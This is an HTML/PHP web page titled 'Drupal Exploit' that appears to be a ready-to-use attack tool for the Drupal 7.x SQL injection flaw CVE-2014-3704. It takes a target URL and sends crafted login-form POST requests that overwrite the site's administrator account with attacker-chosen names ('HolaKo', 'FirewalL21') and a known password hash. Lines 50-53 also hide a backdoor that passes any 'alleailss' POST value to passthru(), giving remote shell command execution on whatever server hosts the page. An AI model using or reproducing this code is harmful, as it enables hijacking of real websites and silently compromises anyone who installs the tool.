Drupal core 7.x

1. <!Doctype HTML>
2. <html>
3. <head>
4. <script src='http://www.w32.info/TR/html4/loose.dtd'></script>
5. <link rel="shortcut icon" href="http://cdn.flaticon.com/png/256/34323.png">
6. <title>Drupal Exploit</title>
7. <style type="text/css">
8. .mymargin{
9. margin-top:30px;
10. color:white;
11. font-family: monospace;
12. }
13. body{
14. background-color:#999;
15. }
16. a {
17. color: red;
18. text-decoration: none;
19. }
20. h1 {
21. color: #40E1C9
22. }
23. h2 {
24. color : #008000;
25. }
26. </style>
27. </head>
28. <body>
29. <center>
30. <img src="https://4.bp.blogspot.com/-KHPL4kdw-yo/WW2YRBpx6LI/AAAAAAAAADk/CNl6_B5f6iUXS-I9gRp9sLV5oa9fek9jACLcBGAs/s1600/_20170718_093248.png" width="150" height="160">
31. <div class="mymargin">
32. <center>
33. <h1>Drupal Exploit</h1>
34. <h2>Version 7.x</h2>
35. <form method="GET" action="">
36. Site : <input type="text" name="url" placeholder="Example: www.site.com">
37. <input size="50" type="submit" name="submit" value="Attack">
38. </form>
39. <br>
40. <?php
41. #-----------------------------------------------------------------------------#
42. # Exploit Title: Drupal core 7.x - SQL Injection #
43. # Date: Oct 16 2014 #
44. # Exploit Author: Dustin Dörr #
45. # Software Link: http://www.drupal.com/ #
46. # Version: Drupal core 7.x versions prior to 7.32 #
47. # CVE: CVE-2014-3704 #
48. #-----------------------------------------------------------------------------#
49. error_reporting(0);
50. if ($_POST['alleailss']){
51. $alleailss = $_POST['alleailss'];
52. passthru($alleailss);
53. }
54. if(isset($_GET['submit'])){
55. $log = "/user/login";
56. $url = "http://".$_GET['url'];
57. $holako = "/?q=user";
58. $post_data = "name[0;update users set name %3D 'HolaKo' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
59. $params = array(
60. 'http' => array(
61. 'method' => 'POST',
62. 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
63. 'content' => $post_data
64. )
65. );
66. $ctx = stream_context_create($params);
67. $data = file_get_contents($url . '/user/login/', null, $ctx);
68. echo "<h3>Testing user/login </h3>";
69. if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data)|| (stristr($data, 'FcUk Crap') && $data)) {
70. echo "<h1>Success</h1><br><h3>User : HolaKo<br>Password : admin<br><h3><a href='{$url}{$log}'>Click here</a>";
71. } else {
72. echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
73. }
74. }
75.  
76. if(isset($_GET['submit'])){
77.  
78. $url = "http://".$_GET['url']."/";
79. $post_data = "name[0;update users set name %3D 'FirewalL21' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
80. $params = array(
81. 'http' => array(
82. 'method' => 'POST',
83. 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
84. 'content' => $post_data
85. )
86. );
87. $ctx = stream_context_create($params);
88. $data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
89. echo '<h3>Testing at Index</h3>';
90. if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
91. echo "<h1>Success</h1><br><h3>User : HolaKo<br>Password : admin<br><h3><a href='{$url}{$holako}'>Click here</a>";
92. } else {
93. echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
94. }
95. }
96.  
97. ?>
98. <h3>Developed By FirewalL21</h3>
99. </div>
100.  
101. </body>
102. </html>